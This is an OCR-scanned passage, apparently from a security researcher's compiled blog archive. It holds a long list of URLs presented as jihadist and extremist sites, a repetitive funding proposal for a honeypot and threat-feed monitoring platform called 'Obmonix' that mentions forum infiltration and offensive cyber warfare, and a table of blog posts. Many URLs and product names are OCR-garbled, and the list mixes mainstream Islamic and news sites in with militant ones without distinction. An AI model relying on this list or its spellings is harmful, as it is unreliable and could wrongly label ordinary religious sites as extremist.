• http://hizb-ut-tahrir.info 

• http://hizb-ut-tahrir.org 
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• http://hizb-ut-tahrir.se 

• http://hizb-uzbekistan.info 

• http://hizb.org.ua 

• http://hizb.org.uk 

• http://Hizbollah.org 

• http://hizbollah.tv 

• http://Hizbollah.tv 

• http://hizbut-tahrir.or.icl 

• http://hizbuttahrir.info 




• http://hizbuttahrir.org 

• http://ht-afghanistan.org 

• http://ht-bangladesh.info 

• http://ht-tunisie.info 

• http://htmedia.info 

• http://alboraqmedia.org 

• http://alekhlaas.cc 

• http://alweehdat.com/vb 

• http://Hussamaldin.jeeran.com 

• http://iaisite-eng.org 

• http://iaisite.biz 

• http://laisite.info 

• http://iaisite.info 

• http://iaisite.info/index.php 

• http://iaisite.net 

• http://iaisite.org 

• http://iczkeria.blog.onet.pl 

• http://ikhwan.net 

• http://imamtv.com 

• http://imamtv.com/ 




• http://infovlad.net/mirror_alansar _alsunnah 

• http://invitetoislam.com 
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• http://invitetoislam.org 

• http://iraq-war.ru 

• http://lraqiasaeb.org 

• http://iraqipa.net 

• http://iraqirabita.org.uk 

• http://iraqiyoon.com 

• http://lraqpatrol.com 

• http://iraqpatrol.com 

• http://iraqpatrol.com/php 

• http://isdarat-tube.com 

• http://isdarat.org 

• http://isdarat.tv 

• http://isecurlty.com 

• http://islahhaber.net 

• http://islam-iea.com 

• http://islamdaveti.com 

• http://islamdevleti.info 




• http://islamdevleti.org 

• http://islamdevleti.org/ 

• http://islamdin.com 

• http://islamdin.net 

• http://islamic-dw.com 

• http://islamic-f.net/vb 

• http://lslamic-f.net/vb 

• http://islamic-state.ga 

• http://islamic-state.media 

• http://islamicawakening.com 

• http://islamicdigest.net 

• http://islamiciraq.maktoobblog.com 

• http://lslamiclraq.modawanati.com 

• http://islamiciraq.modawanati.com 
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• http://islamicstate.media 

• http://islamicstate.pro 

• http://islamicsupremecouncil.org 

• http://islammemo.cc 

• http://islampos.com 




• http://islamqa.info 

• http://islamway.com 

• http://isnews.net 

• http://j-aliraq.net 

• http://jaami.info 

• http://jaber-m-b.maktoobblog.com 

• http://jaber-mb.maktoobblog.com 

• http://jabhtnosra.appspot.com 

• http://jaishabibaker.net 

• http://JaishabiBaker.net 

• http://jamaatshariat.com/ru 

• http://jamahirl.ps 

• http://jamatclawa.com 

• http://jamatclawa.org 

• http://jannatoshiqlari.net 

• http://jehaclway.7olm.org 

• http://jihaclmin.com 

• http://jnoub.org 

• http://JonclurRahmaan.com 

• http://jsc-web.net/vb 




• http://kabardeyonline.org/tr/index _tr.htm 

• http://kafilahmujahid.com 

• http://kafkaz.maktoobblog.com 

• http://Kataeb-20.org 

• http://kataeb-20.org/main 

• http://kataibaqssa.com/forum/index.php 
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• http://kataibaqssa.com/newarab 

• http://kavkaz.org.uk 

• http://kavkaz.tv 

• http://kavkazcenter.com 

• http://kavkazcenter.info 

• http://kavkazcenter.net 

• http://kavkazchat.com 

• http://kavkazjihad.com 

• http://khabarpana.com 

• http://khaleelstyle.com 

• http://khelafa.org 

• http://khilafa.org 

• http://khilafah-archives.com 




• http://khilafah.com 

• http://khilafah.net 

• http://khilafat.dk 

• http://kiblat.net 

• http://kirkuk.kalamfikalam.com 

• http://kokludegisim.net 

• http://ktb-20.com 

• http://Kwaflislam.com 

• http://kwaflislam.com/vb/index.php 

• http://ladn.maktoobblog.com 

• http://lakii.com 

• http://land-alsham.com 

• http://lasdipo.com 

• http://liputan-kita.com 

• http://m3ark.com 

• http://mail.ek-ls.org 

• http://Majahd.quickbb.net 

• http://majahd.quickbb.net/index.htm 
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• http://majahden.com 




• http://majelismujahidi.com 

• http://majles.alukah.net 

• http://maktoobblog.com 

• http://manbar.me 

• http://maqrezeradio.net 

• http://marsad.net 

• http://mediaislam.ucoz.ru 

• http://medicine2001.maktoobblog.com 

• http://mhesne.com 

• http://mitv.moy.su 

• http://mnbr.info 

• http://mobasher.110mb.com 

• http://moj-irq.com 

• http://montada.yaqen.net 

• http://moqavemat.com 

• http://moqawama.org 

• http://moqawama.tv 

• http://moqawmh.com 

• http://morasl.maktoobblog.com/ 

• http://mujahideenarmy.com 




• http://muntada.sawtalurnrnah.corn 

• http://muqawamah.com 

• http://muslimdaily.net 

• http://musiimprisoners.com 

• http://musiimuzbei<istan.net 

• http://musim.net 

• http://musim.net/vb 

• http://musim.org 

• http://muvahhid.info 

• http://muwahhid.info 
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• http://muwahideen.co.nr 

• http://myhesbah.net 

• http://myi<hiiafah.com 

• http://mymy.my-goo.net/index.htm 

• http://nahimuni<ar.com 

• http://nasroiiah.org 

• http://Nasrunmiaiiah.net 

• http://nepras.ps 

• http://news.stcom.net 




• http://News.stcom.net 

• http://nkusa.org 

• http://nmayd.com 

• http://nmayd.com/ 

• http://nuruddin.4bb.ru 

• http://nusraah.com 

• http://old.kavkazcenter.com 

• http://omar-abdrahman.110mb.com 

• http://pal-is.net/vb 

• http://paldf.net 

• http://paldf.net/forum 

• http://palestine-info.com 

• http://palestinegallery.com 

• http://palestinianforum.net 

• http://palir.net 

• http://panjimas.com 

• http://pda.kavkaz.tv 

• http://profetensummah.com 

• http://qassam-rockets.skyrock.com 

• http://qassam-rockets.skyrock.com 




• http://qassam.ps 

• http://qudsnews.net 
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http://qyemen.com 

http://radioalfurqaan.com 

http://radioalfurqaan.com is 

http://radioandalus24.com 

http://radyotevhid.com 

http://ramaadi.ltalk.net/index.htm 

http://rawadalmaly.com/vb 

http://reformandjihadfront.org 

http://revolution.muslimpad.com 

http://rjfront.info 

http://rjfront.org 

http://Rmadi.top-me.com 

http://saadarmy.com 

http://saaid.net 

http://sadcom.montadamoslim.com 

http://salaf-us-saalih.com 

http://Salafia.balder.prohosting.com 




• http://salafiah.com 

• http://salafimediauk.com 

• http://salam-online.com 

• http://samirkuntar.org 

• http://saraya.ps 

• http://Sarayaalquds.org 

• http://sarayaalquds.org 

• http://Sarayasaad.com 

• http://sarayasaad.com 

• http://save-islam.com 

• http://Sawtaljihad.org 

• http://sawtaljihad.org 

• http://sawtalummah.com 

• http://se-te.com 
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• http://shabakataljahad.com 

• http://shahamat-arabic.com 

• http://shahamat-english.com 

• http://shahamat-farsi.com 

• http://shahamat-movie.com 




• http://shahamat-urdu.com 

• http://shamikhl.info 

• http://shamilonline.org/rusnya/index _ru.htm 

• http://sharia4indonesia.com 

• http://Shiaweb.org 

• http://shiaweb.org/hizbulla/index.html 

• http://Shmo5allslam.net 

• http://shoutussalam.org 

• http://skaba.ps 

• http://Sobhank.com 

• http://sobhank.com/vb 

• http://somalimemo.net 

• http://somod.org 

• http://soutalhaq.net 

• http://Soutweb.100free.com 

• http://sqr-al3rb.com 

• http://suara-islam.com 

• http://sunnahcare.com 

• http://sunnahonline.com 

• http://suwaidan.com 




• http://swalif.net 

• http://syamina.com 

• http://syamorganizer.com 

• http://tahrir-syria.info 

• http://tajcleecl.org.uk 

• http://takvahaber.net 
264 

• http://tarani.info 

• http://Tawhecl.ws 

• http://tevhiclclergisi.com 

• http://tevhiclclersleri.com 

• http://tevhicliclavet.com 

• http://tevhicligunclem.net 

• http://theshamnews.com 

• http://thethircljihacl.com 

• http://thoriquna.com 

• http://thoriquwna.com 

• http://toorabora.org 

• http://turkhackteam.org 

• http://twelvershia.net 




• http://uicforce.co.vu 

• http://ummah.com 

• http://ummahislam.com 

• http://ummetislam.info 

• http://ummetislam.net 

• http://vb999.maktoobblog.com 

• http://vb.fpnp.net 

• http://vb.roro44.com/inclex.php 

• http://vcl.ag 

• http://vclagestan.com 

• http://voa-islam.com 

• http://W-N-N.net 

• http://Wa3acl.org 

• http://wa3iarabi.com 

• http://wa7at.org/vb 

• http://wap.kavkaz.tv 

• http://worlclakhbar.com 

• http://worlclnet.ws 
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• http://worlclnet.ws/raclio/inclex.html 




• http://worldnet.ws/vb 

• http://yenidenislam.com 

• http://zad-muslim.com 

• http://zaeerl.22web.net 

• http://zaidhamid.pk 

• http://zuheerl7.maktoobblog.com 

Detailed Project Funding Phase Information 

01. The initial stage of the project will consist of selective 
and timely purchase of all the necessary appliances 

including the timely localization and successful acquisition of 
fake Web sites honeypot solutions including the active 

acquisition of network assets for the purpose of successfully 
honeypot solution placement. 

• Associated deliverables will include access to proprietary 
technology the ability to associate long-term task 

including the ability to set the foundation for the Obmonix 
platform including eventual commercialization of the 

Obmonix platform further enhancing the operator's ability to 
continue providing the Intelligence Community 

with the necessary data to proactively respond to a growing 
set of malicious nation-state and malicious actors 

type of cybercrime and cyber-jihad activity globally. 




02. The next stage will consist of active placement of the 
required equipment in a secure location including the 

placement of active secure measures in place to ensure that 
the Obmonix operator remains work in a secure location 

including premise. 

• Associated deliverables will include secure work place 
including the ability to empower the operator with the 

necessary data to perform various operator activity ensuring 
global presence for Intelligence Community mem¬ 
bers and the security industry 

03. The next stage will consist of active spam phishing and 
malware feed access purchase including successfully 

geolocated placement within specific regions of choice of 
interest inducing but not limited to Algeria, Argentina, 

Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, Colombia, 
Cyprus, Ecuador, Guatemala, Jordan, Democratic 

People's Republic of Korea, Liberia, Macao, Maldives, 

Moldova, Republic of Nauru, Niger, Pakistan, Poland, 
Romania, 

Sierra Leone, Sudan, Arab Republic Syrian, Togo, Uganda, 
Vanuatu, Yemen. 

• Associated deliverables will include access to the world's 
largest portfolio of threat intelligence data set including 

access to real-time data successfully empowering the 
operator with the necessary data to perform an operator 



activity. 
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04. The next stage will include the active acquisition of 
service-based type of localization and acquisition solutions 

leading to a successful set of data to be processed and 
collected by the sensor. 

• Associated deliverables will include access to proprietary 
technology successfully empowering the operator 

with the necessary data to perform the operator activity 
including real-time monitoring of the world's largest 

and most comprehensive sensor network based type of 
cybercrime and cyber-jihad sensor based type of plat¬ 
form. 

05. The next phase will include the active data acquisition 
from the Intelligence Community's leading intelligence 

gathering platform in the form of active data placement 
including the establishment of an active threat intelligence¬ 
gathering portal based type of platform. 

• Associated deliverable will include the world's largest data 
set of cybercrime and cyber jihad activity sensor type 

of platform eventually leading the Obmonix platform to reach 
a commercialization stage further enhancing the 


Intelligence Community's and the security industry's 
mission. 

Detailed Project Cost Proposal Information 

The initial stage of the project will consist of selective and 
timely purchase of all the necessary appliances in¬ 
cluding the timely localization and successful acquisition of 
fake Web sites honeypot solutions including the active 

acquisition of network assets for the purpose of successfully 
honeypot solution placement. 

• FortiMail 

Key points: 

• The appliance is capable of processing millions of emails on 
a daily basis 

• The appliance is capable of maintaining a list of thousands 
of fake emails allowing additional attribution poten¬ 
tially expanding the capabilities of the appliance to include 
additional custom made spam origin sources. 

• The appliance is capable of delivering actionable 
intelligence on millions of spam origin sources, for Iran, Pak¬ 
istan, Saudi Arabia, Iraq and Syria, on a daily basis 

• The appliance is capable of delivering detailed information, 
leading, to the production of actionable intelligence, 

for Iran, Pakistan, Saudi Arabia, Iraq and Syria, on a daily 
basis. 
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BlueOCoat 


Vormetric 

Data Security - 


The FortiMail appliance would ensure the active acquisition 
of spam for the purpose of establishing the foundations 

for a successful research and monitoring type of research and 
analysis type of system allowing the systematic 

real-time and automated acquisition of malicious software 
phishing and social engineering. 

• Blue Coat Malware Analysis 

Key points: 

• The appliance is capable of processing thousands of 
malware samples, on a daily basis 

• The appliance is capable of maintaining detailed 
information processed and delivered in an automated fashion 

for malicious sources originating in Iran, Pakistan, Saudi 
Arabia, Iraq and Syria 


• The appliance is capable of interacting with Web links 
found in malicious spam emails for the purpose of es¬ 
tablishing the foundations, for successful monitoring of 
malicious software phishing and social engineering 

originating for Iran, Pakistan, Saudi Arabia, Iraq, and Syria 
including the automated processing and interaction 

with mobile malware 

• The appliance is capable of maintaining detailed 
information leading to the production of quality real-time, 

actionable intelligence type of reports for malicious software 
phishing and social engineering data type of origin 

sources for Iran, Pakistan, Saudi Arabia, Iraq and Syria 

The Blue Coat Malware Analysis would ensure the automated 
and real-time acquisition of malicious software 

phishing and social engineering type of research and 
analysis type of research for the purpose of ensuring the 
active 

and real-time acquisition of malicious software phishing and 
social engineering research type of activity originating 

in these sources. 

• Vormetric encryption appliance 
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LM Barracuda 

Key points: 

• The encryption appliance would ensure the real-time data 
storage of the research and analysis type of research 

and analysis type of data to ensure the availability 
confidentiality and integrity of the data for the purpose of 

producing actionable real-time intelligence based type of 
research and analysis reports type of research and 

analysis data. 

• The encryption appliance would ensure the active real-time 
storage of the actionable and real-time delivered 

type of research and analysis type of data allowing the 
efficient and systematic and automated research and 

analysis type of research report data to be processed and 
analyzed. 

The encryption appliance would ensure that the platform 
operator is properly empowered with the necessary data 

techniques and technologies to properly act upon analyze 
and respond to cybercrime and cyber jihad events globally. 

• Barracuda Web Application appliance 


Key points: 


• The Web application appliance would allow the automated 
secure use of the robot system allowing the system¬ 
atic real-time data acquisition on various jihadst sources 

• The Web application appliance would ensure the 
automated and efficient use of the robot in a secure fashion 

allowing the production of real-time actionable intelligence 
allowing the production of research and analysis 

based type of research and analysis type of, data. 

The Web application appliance would ensure that the 
operator is properly empowered with the necessary data 

techniques and technologies to properly act upon analyze 
and respond to cybercrime and cyber jihad events globally. 

• Checkpoint DDoS Protector 
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SOFTWARE TECHNOLOGIES LTD. 

Ultra Electronics 3eTI 

Key points: 

• The appliance is capable of preventing exposure of the 
network assets utilized by the network resulting poten¬ 
tially resulting in the exposure of the availability 
confidentiality and integrity of the information 




• The appliance is capable of ensuring the real-time 
automated and persistent availability and integrity and con¬ 
fidentiality of the information 

The Checkpoint DDoS Protector would ensure the constant 
availability of the network infrastructure utilized in this 

project potentially preventing compromise of the network 
assets resulting in improved productivity and realization 

of various project objectives. 

• Encryption appliance 

Key points: 

• The encryption appliance is capable of ensuring the 
confidentiality integrity and availability of the information 

• The encryption appliance is capable of distinguishing 
between multiple networks further ensuring a closed 

network type of network access 

The encryption appliance would ensure that the maximum 
possible secure measures are currently in place further 

ensuring that access to the closed restricted network remains 
as private as possible ensuring the confidentiality 

integrity and availability of the information to further ensure 
the active real-time intelligence based real-time type of 

research and analysis type of research and analysis type of 
data. 

• Cisco Catalyst 
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CISCO 


kapOw 


Key points: 

• The appliance is capable of ensuring the real-time and 
automated use of the network equipment necessary to 

maintain the active infrastructure to ensure that it's 
operating in an automated and efficient fashion 

Cisco Catalyst is a network equipment allowing the efficient 
productivity type of interconnection between all the 

platforms and network equipment used in this project. 

• Kapow appliance 


Key points: 




• The appliance is capable of processing hundreds of 
thousands of Web sites on a daily basis ensuring the au¬ 
tomated processing and analysis of jihadist communities 
allowing the automation of the monitoring process 

to further enhance the produced actionable intelligence 
leading to a research and analysis produced type of 

research and analysis type of data. 

• The appliance is capable of monitoring and establishing 
the foundations for real-time monitoring and analysis 

of jihadist communities for the purpose of producing 
actionable real-time intelligence research and analysis 

type of research and analysis data. 
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• The appliance is capable of processing multiple jihadist 
forum communities for the purpose of establishing the 

foundations for successful real-time actionable intelligence 
producing research and analysis type of research 

and analysis data. 

The analysis appliance would ensure timely and real-time 
access to current and historical intelligence data in regard 

to jihadist activities online,through the systematic 
automated and real-time data acquisition from a variety of 
public 

and closed sources for the purpose of setting up the 
foundations for a successful data source leading to a 
successful 

analysis and research type of analysis activities. 

• Appliance router 

Key points: 

• The appliance router would ensure the constant and real¬ 
time availability of the network assets for the purpose 

of active and timely acquisition of actionable real-time 
research and analysis type of research and analysis report 

type of research and analysis network assets availability. 

The purpose of the appliance router would be to ensure real¬ 
time connectivity with a variety of platforms to ensure 

that the operator is properly empowered with the necessary 
data techniques and technologies to properly act upon 



analyze and respond to cybercrime and cyber jihad events 
globally. 

• Analytics appliance 
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Key points: 

• the analytics appliance would be capable of performing 
real-time assessment of cybercrime and cyber jihad 

events globally and will ultimately empower the Obmonix 
platform operator with the necessary data informa¬ 
tion and knowledge to act upon prevent and respond to 
cybercrime and cyber jihad events globally 

The purpose of the appliance would be to empower the 
operator with the necessary data information and knowledge 

to act upon react to and respond to various cybercrime and 
cyber jihad events globally. 

• Rosette appliance 


Key points: 


• The localization appliance will ultimately empower the 
Obmonix platform operator with the necessary data 

information and knowledge to act upon respond to and 
prevent widespread damage while analyzing cybercrime 

and cyber jihad events globally. 

The purpose of the localization appliance would be to 
empower the Obmonix platform operator with the necessary 

data information and knowledge to act upon respond to and 
prevent widespread damage provoked by cybercrime 

and cyber jihad events globally. 

• Systran appliance 
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Key points: 

• The Systran appliance will ultimately empower the operator 
with the necessary data information and knowledge 

to act upon respond to and prevent widespread damage 
while analyzing cybercrime and cyber jihad events 

globally. 

The purpose of the Systran appliance would be to empower 
the Obmonix platform operator with the necessary data 


information and knowledge to act upon respond to and 
prevent widespread damage provoked by cybercrime and 

cyber jihad events globally. 

Funding Phase 

The initial funding phrase will consist of active acquisition of 
assets for the purpose of obtaining access to 

industry leading and proprietary selected providers of threat 
intelligence for the purpose of establishing the 

foundations for an active sensors network type of 
cybercrime/cyber jihad monitor sensor network type of data. 
The 

initial stage will consist of obtaining assets for the purpose of 
obtaining access to industry leading and proprietary 

selected equipment for the purpose of setting the 
foundations for a successful sensor network based type of 
data. 

The initial phase will consist of active purchase of the 
following equipment: FortiSandbox, Blue Coat Malware 

Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco 
Catalyst, Vormetric encryption appliance, including the 
following 

subscription-based type of threat intelligence gathering data 
- Team Cumry, threat, data, feed, Kaspersky, threat, 

data, feed, Abusix, threat, data, feed, MalwarePatrol, threat, 
data, feed, Sophos, threat, data, feed, OPSWAT, Abusix, 



Threat, Feed, Threat, Feed, ProjectFloneypot, threat, data, 
feed. 

- Kaspersky Data Feed 

- Sophos Data Feed 

- Team Cumry Data Feed 

- MalwarePatrol Data Feed 

- Abusix Data Feed 

- LookingGlass Data Feed 

- Cyren Data Feed 

- Symantec Data Feed 
-VirusTotal Data Feed 
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- ProjectFloneypot Data Feed 

The second funding phase will consist of active acquisition of 
honeypot appliance including active netblock 

purchase within a dedicated set of countries for the purpose 
of establishing the foundations of an active sensor 

network type of data-acquisition activities. The second 
funding phase will consist of active acquisition of the 
following 

proprietary appliances: Floneybox Enterprise, honeybox 
SCADA, including netblocks within the following countries. 



The third funding phase will consist of active purchase of 
service and solution-based appliance, including data- 

processing appliance, including localization appliance, for 
the purpose of setting up the foundations for the Obmonix 

platform successfully empowering its operator with the 
necessary data and expertise for the purpose of actively 

responding to global cybercrime and jihad events. 

The third funding phase will consist of active purchase of the 
following appliances: Kapow Software, Rosette 

appliance, Systran appliance. Sentinel appliance, Palantir 
appliance. 

The fourth funding phase will consist of active purchase of 
the World's most popular solution-oriented portal 

for Information Security - Expedited Entry Into the Cyber 
Warfare Realm - a Pro-U.S Based Offensive and 
Asymmet¬ 
ric Cyber Warfare Practical Trends Application Big 
Data and Research-Centered R &D Platform - further 
ensuring 

successfully and ongoing commercilization including the 
active acquisition of client-base, including the establishing 

of the World's largest endpoint based sensor network for 
tracking and responding to cybercrime and jihad events 

globally. 

Dancho Danchev will build a pro-U.S offensive and 
asymmetric cyber warfare program that will inevitably dive 



deep into the Cyber Warfare realm and will produce what can 
be best described as the U.S primary source for 

offensive and asymmetric cyber warfare information 
repository and data-information on current and future trends 

and provide the foundations for a successful R &D cyber 
warfare partnership with millions of loyal Pro-Western 

cyber warriors and researchers globally positioning the 
platform as the leading think-tank for practical and relevant 

cyber warfare power including the World's leading Pro- 
Western Cyber Warfare Research and Development research 

program center. 

With the U.S attempting to tackle the country's perceived 
and outdated Mis-understanding of Cyber Warfare 

in Today's Modern Russia China and Iran dominated Cyber 
Warfare Realm including the ongoing shortage of 

recruitment and relatively outdated and not necessary 
dynamic HR-management pool of hundreds of thousands of 

Pro-U.S Cyber Warriors the platform ultimately empower the 
re-position the U.S as the dominant Cyber Warfare 

power by providing actionable think-tank type of proactive 
and actionable Cyber Warfare insight including the active 

and permanent recruitment of millions of Pro-U.S Cyber 
Warriors further supporting the U.S's mission on its way to 

dominate and launch offensive and defensive cyber missions 
and related research attacks. 



The project will conduct what can be best described as the 
most comprehensive study and analysis to the 
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United States out-dated understanding of the Cyber Warfare 
realm and provide actionable and practical insight including 
a production-ready HR-management and Big Data driven 
Cyber Warfare platform successfully disrupting 

international cybercrime networks conducting economic 
terrorism infiltrating the vibrant cyber-crime and cyber jihad 

international community and successfully recruiting millions 
of Pro-U.S Cyber Warriors. The First Stage of the project 

would ensure that the foundations for a successful invite-only 
Pro-U.S Cyber Warfare community have already been 

established through the direct launching and operation of 
the World's Largest and Proprietary Invite-Only Pro-U.S 

Cyber Warfare Forum Community. 

Associated deliverables will include: the World's largest 
search engine for security information, the World's 

most vibrant community for security job search, the World's 
most vibrant proprietary community for sharing dissem¬ 
inating communicating and enriching security data, the 
World's most comprehensive sensor network for observing 

disseminating and responding to global cybercrime-events, 
the release of community-enriched security router, the 

successful release of community-enriched privacy router, the 
development and release of community-enriched 



public threat feed, the release of community-enriched private 
threat feed, including, proprietary threat feed, targeted 

threat intelligence on demand type of research and analysis 
producing solution, proprietary bug bounty solution, 

hacking and security-oriented online radio, hacking and 
security-oriented E-zine, hacking and security-oriented 

videocast, on-demand penetration testing and offensive 
team consulting, on-demand Web site monitoring for 

security events, OEM partnership capabilities, custom-build 
anti-virus scanner capabilities. 

Community Industry Reference 

The contractor Dancho Danchev is an internationally 
recognized cybercrime researcher security blogger and 
threat 

intelligence analyst in the field of cybercrime research 
having successfully contributed to the overall demise of 

cybercrime internationally throughout the past decade 
having successfully pioneered a variety of threat intelligence 

gathering methodologies leading him to a successful, 
pursued of high profile nation-state actors and malicious 
actors 

across the globe leading him to a successful pursued of high- 
profile nation-state actors and malicious adversaries 

across the globe the researcher successfully launched a 
newly launched startup named Disruptive Individuals aiming 



to disrupt the undermine the international cybercrime and 
cyber-jihad ecosystem globally. 

Statement of Work (SOW) 

01. Vendor contact - the initial stage of the project will 
consist of direct contact between industry leading 
commercial 

security appliance providers further requesting pricing and 
shipping details including a "point-of-contact". 

• Possible deliverables consisting of the initial stage include 
industry-leading security appliance - FortiMail, Blue 

Coat Malware Analysis. FortiSandbox, Vormetric encryption 
appliance, Barracuda Web Application appliance, 

Checkpoint DDoS Protector, Ethernet encryptor, Cisco 
Catalyst, Kapow appliance, Palantir appliance, Cisco fire¬ 
wall appliance. Rosette appliance, Systran appliance, NAS 
appliance, pfSense appliance, Floneybox appliance, 

Floneybox SCADA appliance. 

02. Vendor netblock contact - The initial stage of the project 
will consist of direct contact between industry leading 
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providers of netblock requesting pricing information for 
specific pre-defined geolocated regions of interest. 

• Possible deliverables including netblock in Algeria, 
Argentina, Bahrain, Bolivia, Brazil, Burkina faso, Chile, China, 



Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic 
People's Republic of Korea, Liberia, Macao, Mal¬ 
dives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, 
Romania, Sierra Leone, Sudan, Arab Republic Syrian, 

Togo, Uganda, Vanuatu, Yemen. 

03. Vendor threat data contact - the initial stage of the 
project will consist of direct contact between industry¬ 
leading 

including a selected set of threat data providers requesting 
pricing information including possible partnership 

opportunity. 

• Possible deliverables including Team Cumry threat data 
feed Kaspersky threat data feed, Abusix threat data 

feed, MalwarePatrol threat data feed, Sophos threat data 
feed, OPSWAT, Abusix Threat Feed, ProjectHoneypot 

threat data feed. 

04. Secure location foundation - the initial stage of the 
project will consist of direct evaluation of the infrastructure 

required for the secure location including direct contact 
between security vendors to ensure a secure location. 

• Possible, deliverables, include, military-grade, fence, 
surveillance, security, guard. 

05. Vendor connection contact - the initial stage of the 
project will consist of direct contact between vendor to 



ensure that the infrastructure is properly secured ensuring a 
timely and secure infrastructure. 

• Possible deliverables include direct connection. 

06. Secure work environment - the initial stage of the project 
will consist of direct evaluation including a direct 

purchase of a work terminal to ensure a smooth and secure 
work environment 

• Possible deliverables including RF shielding, SEL SP-157, 
FSPK-10, SEL SP-113 "Blockade". 

07. Secure work environment - the initial stage of the project 
will consist of direct evaluation including a direct 

purchase of equipment related to secure work environment 
to ensure a smooth and secure work environment. 

• Possible deliverables including Cisco Firepower ASA, 
Checkpoint Threat appliance. Nova network appliance, 

Fortinet security appliance, Dell Soho network, security 
appliance. 

The contractor Dancho, Danchev is one of the world's leading 
experts in the field of cybercrime research and threat 

intelligence gathering having successfully tracked monitored 
and profiled high-profile nation-state and malicious 

actors type of fraudulent activity over the past decade 
having successfully pioneered and established a direct 

connection with some of the world's leading providers of 
threat intelligence gathering. 



The contractor's initial goal for the purpose of the Obmonix 
platform would be to achieve the world's largest 
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and most comprehensive sensor type of network for 
monitoring profiling and keeping track of nation-state 
malicious-actors type of fraudulent and malicious activity. 

The project main base would be located in a discreet location 
in Sofia Bulgaria. The contractor would eventu¬ 
ally ensure that active RF shielding including basic physical 
security measures are taken in place including active 

surveillance military-grade fence and an associated security 
guard are in place for the purpose of establishing the 

foundation of a secure work environment. 

The Obmonix platform aims to build the World's most 
versatile and comprehensive sensor network for inter¬ 
cepting monitoring and responding to cybercrime and cyber 
jihad events successfully deploying a variety of 

proprietary sensor network based of honeypot appliances 
industry-wide partnership including the utilization of 

proprietary cybercrime and cyber jihad forum and 
community monitoring and infiltration campaigns 
successfully 

positioning the platform as the leading indicator for 
cybercrime and cyber jihad activity globally. 


Cost Proposal - Detailed Project Information 



01. Equipment cost - The Obmonix platform will ultimately 
rely on the following equipment cost for the purpose of 

establishing the foundations for the Obmonix platform. 

• FortiMail 

• FortiSandbox 

• Blue Coat Malware Analysis 

• Vormetric encryption appliance 

• Checkpoint DDoS Protector 

• Encryption appliance 

• Cisco Catalyst 

• Kapow appliance 

• Appliance router 

• Analytics appliance 

• Infoblox Trinzic 1420 

• Nova network security 

• Cisco firewall appliance 

• lllusionBlack Framework 

• Rosette appliance 

• Systran appliance 
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• NAS appliance 

• pfSense 

• Moneybox appliance 

• Moneybox SCADA appliance 

• Network equipment 

Detailed Project Funding Phase Information 

01. The initial funding phrase will consist of active 
acquisition of assets for the purpose of obtaining access to 
industry leading and proprietary selected providers of threat 
intelligence for the purpose of establishing the foundations 
for 

an active sensors network type of cybercrime/cyber jihad 
monitor sensor network type of data. The initial stage 

will consist of obtaining assets for the purpose of obtaining 
access to industry leading and proprietary selected 

equipment for the purpose of setting the foundations for a 
successful sensor network based type of data. 

• The initial phase will consist of active purchase of the 
following equiptment: FortiSandbox, Blue Coat Malware 

Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco 
Catalyst, Vormetric encryption appliance, including the 

following subscription-based type of threat intelligence 
gathering data - Team Cumry threat data feed, Kaspersky 

threat data feed, Abusix,threat data feed, MalwarePatrol 
threat data feed, Sophos threat data feed, OPSWAT, 



Abusix Threat Feed, ProjectHoneypot threat data feed. 
Including the following Threats Feeds: 

• Kaspersky Data Feed 

• Sophos Data Feed 

• Jigsaw Threat Data Feed 

• IBM X-Force Exchange 

• Team Cumry Data Feed 

• Proofpoint Threat Feed 

• NetSTAR Data Feed 

• RisklQ Data Feed 

• ESET Data Feed 

• Pixalate Data Feed 

• MalwarePatrol Data Feed 

• Abusix Data Feed 

• Massive Data Feed 

• PhishLabs Data Feed 

• LookingGlass Data Feed 
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• Blueliv Data Feed 


Mnemonic Data Feed 




• Cyren Data Feed 

• ADMINUSLabs Data Feed 

• NSFOCUS Data Feed 

• Webroot Data Feed 

• Symantec Data Feed 

• VirusTotal Data Feed 

• ProjectFloneypot Data Feed 

02. The second funding phase will consist of active 
acquisition of honeypot appliance including active netblock 

purchase within a dedicated set of countries for the purpose 
of establishing the foundations of an active sensor 

network type of data-acquisition activities. 

• The second funding phase will consist of active acquisition 
of the following proprietary appliances: Floneybox 

Enterprise, Infoblox Trinzic 1420, honeybox SCADA, including 
netblocks within a dedicated set of countries - 

Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina faso, 
Chile, China, Colombia, Cyprus, Ecuador, Guatemala, 

Jordan, Democratic People's Republic of Korea, Liberia, 

Macao, Maldives, Moldova, Republic of Nauru, Niger, 

Pakistan, Poland, Romania, Sierra Leone, Sudan, Arab 
Republic Syrian, Togo, Uganda, Vanuatu, Yemen. 




03. The third funding phase will consist of active purchase of 
service and solution-based appliance, including 

data-processing appliance, including localization appliance, 
for the purpose of setting up the foundations for the 

Obmonix platform successfully empowering its operator with 
the necessary data and expertise for the purpose of 

actively responding to global cybercrime and jihad events. 

• The third funding phase will consist of active purchase of 
the following appliances: Kapow Software, Rosette 

appliance, Systran appliance. Sentinel appliance, Palantir 
appliance. 

In case you're interested in working with me for the purpose 
of implementing this project including possible investor 

introduction -1 can be reached at 
dancho.danchev(g)hush.com 

1. httD://www.d ia.mil/Business/NeediDedla/ 

2. httDs://www.srf.or a/ 
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Document Outline 


. 2017 

o January 

■ Historical OSINT - Massive Black Hat SEP 

Campai gn. S potted in the Wild . Serves 
Scareware - Part Two (2017-01-05 10:22 ) 

■ Historical OSINT - Malicious Malvertisin a 

Campai gn. S potted at FoxNews . Serves 
Scareware (2017-01-05 11:19 ) 

o Ma y 

■ Historical OSINT - Inside the 2007-2009 Series of 

C yber Attacks A g ainst Multiple International 
Embassies (2017-05-29 08:28 ) 

■ Historical OSINT - A Portfolio of Exploits Seryin o 
Domains (2017-05-29 09:04 ) 

■ Historical OSINT - A Portfolio of Fake/Ro o ue 
Video Codecs ( 2017-05-29 09:27 ) 

■ Historical OSINT - A Diyersified Portfolio of Fake 

Security Software ( 2017-05-29 09:38 ) 

■ Historical OSINT - Goo o le Sponsored Scareware 
S potted in the Wild (2017-05-29 15:48 ) 

■ Historical OSINT - A Diyersified Portfolio of 

Pharmaceutical Scams Spotted in the Wild 
( 2017-05-29 16:04 ) 

■ Historical OSINT - Massiye Black Hat SEP 

Campai g n Spotted in the Wild (2017-05-29 
19:28 ) 

■ Historical OSINT - Mac OS X PornTube Malware 

Seryin o Domains (2017-05-29 20:05 ) 
o Noyember 

